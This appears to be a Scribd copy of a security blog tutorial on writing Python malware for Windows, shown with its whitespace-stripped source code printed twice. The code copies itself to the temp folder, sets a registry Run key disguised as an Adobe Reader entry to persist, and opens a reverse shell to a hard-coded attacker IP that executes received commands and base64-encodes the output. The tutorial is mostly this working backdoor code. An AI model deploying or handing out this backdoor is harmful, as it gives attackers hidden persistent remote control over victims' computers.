Scribd
Upload
338 views

0xC Python Tutorial - Python Malware

The document discusses using Python to create malware that copies itself to the Windows temp directory and adds an entry to the registry run key to persist, then establishes a reverse shell back to an attacker's IP address. Code is provided to demonstrate these techniques.

Uploaded by

Mihai Qra
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
338 views

0xC Python Tutorial - Python Malware

The document discusses using Python to create malware that copies itself to the Windows temp directory and adds an entry to the registry run key to persist, then establishes a reverse shell back to an attacker's IP address. Code is provided to demonstrate these techniques.

Uploaded by

Mihai Qra
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Home

Blog

Talks

Tutorials

Podcast

Reviews

About Us

0xC Python Tutorial: Python Malware


Home / 0xC Python Tutorial: Python Malware

This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller. In a previous tutorial we
demonstrated how to compile a Python script as a Portable Executable(PE) using PyInstaller. Now lets demonstrate some quick
proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:

One of the most common things youll find with malware is it wanting to gain persistence on the victim. There are loads of ways to
achieve persistence on Windows, one of the more common being to modify the following registry key:
Software\Microsoft\Windows\CurrentVersion\Run. Below is a quick screenshot of the Python code to copy the program to the
%TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

importsys,base64,os,socket,subprocess
from_winregimport*

defautorun(tempdir,fileName,run):
#Copyexecutableto%TEMP%:
os.system('copy%s%s'%(fileName,tempdir))

#QueriesWindowsregistryforkeyvalues
#Appendsautorunkeytorunkeyarray
key=OpenKey(HKEY_LOCAL_MACHINE,run)
runkey=[]
try:
i=0
whileTrue:
subkey=EnumValue(key,i)
runkey.append(subkey[0])
i+=1
exceptWindowsError:
pass

#Setautorunkey:
if'AdobeReaderX'notinrunkey:
try:
key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_ALL_ACCESS)
SetValueEx(key,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
key.Close()
exceptWindowsError:
pass

Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the
code, the reverse shell. I leveraged a Python reverse shell released by TrustedSec and made one modification Base64 encode the

network traffic:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

defshell():
#Base64encodedreverseshell
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.1',int(443)))
s.send('[*]ConnectionEstablished!')
while1:
data=s.recv(1024)
ifdata=="quit":break
proc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subproces
stdout_value=proc.stdout.read()+proc.stderr.read()
encoded=base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()

defmain():
tempdir='%TEMP%'
fileName=sys.argv[0]
run="Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir,fileName,run)
shell()

if__name__=="__main__":
main()

Now when this program executes it will open up a reverse shell back to the attacker which in this case is a hard coded IP in the
script, but it could easily be domain, or maybe something in the Amazon cloud. Below is a quick screen shot demonstrating the
program executing on a Windows host and connecting back to the attacker. You can notice the network traffic is base64 encoded:

Here is the full code:


1
2
3
4
5
6
7

importsys,base64,os,socket,subprocess
from_winregimport*

defautorun(tempdir,fileName,run):
#Copyexecutableto%TEMP%:
os.system('copy%s%s'%(fileName,tempdir))

7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

#QueriesWindowsregistryfortheautorunkeyvalue
#Storesthekeyvaluesinrunkeyarray
key=OpenKey(HKEY_LOCAL_MACHINE,run)
runkey=[]
try:
i=0
whileTrue:
subkey=EnumValue(key,i)
runkey.append(subkey[0])
i+=1
exceptWindowsError:
pass

#Iftheautorunkey"AdobeReaderX"isn'tsetthiswillsetthekey:
if'AdobeReaderX'notinrunkey:
try:
key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_ALL_ACCESS)
SetValueEx(key,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
key.Close()
exceptWindowsError:
pass

defshell():
#Base64encodedreverseshell
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.1',int(443)))
s.send('[*]ConnectionEstablished!')
while1:
data=s.recv(1024)
ifdata=="quit":break
proc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subproces
stdout_value=proc.stdout.read()+proc.stderr.read()
encoded=base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()

defmain():
tempdir='%TEMP%'
fileName=sys.argv[0]
run="Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir,fileName,run)

49
50
51
52
53

autorun(tempdir,fileName,run)
shell()

if__name__=="__main__":
main()

Share this:

6K+

Related

BACK TO THE SOURCE CODE Forward/Reverse Engineering Python


Malware
March 16, 2014
In "blog"

0x4 Python Tutorial: Python to EXE


August 8, 2014
In "blog"

Share This Story, Choose Your Platform!

CTF Scripts and PyInstaller (.py > .exe)


August 25, 2013
In "blog"

Related Posts

Whopper Web Shell

0x5: Introduction to Penetration Testing

June 2nd, 2015 | 0 Comments

February 7th, 2015 | 0 Comments

Introduction to Python
Professionals
January 10th, 2015 | 0 Comments

Copyright 2012-2016 Primal Security|All Rights Reserved|Powered by Coffee

You might also like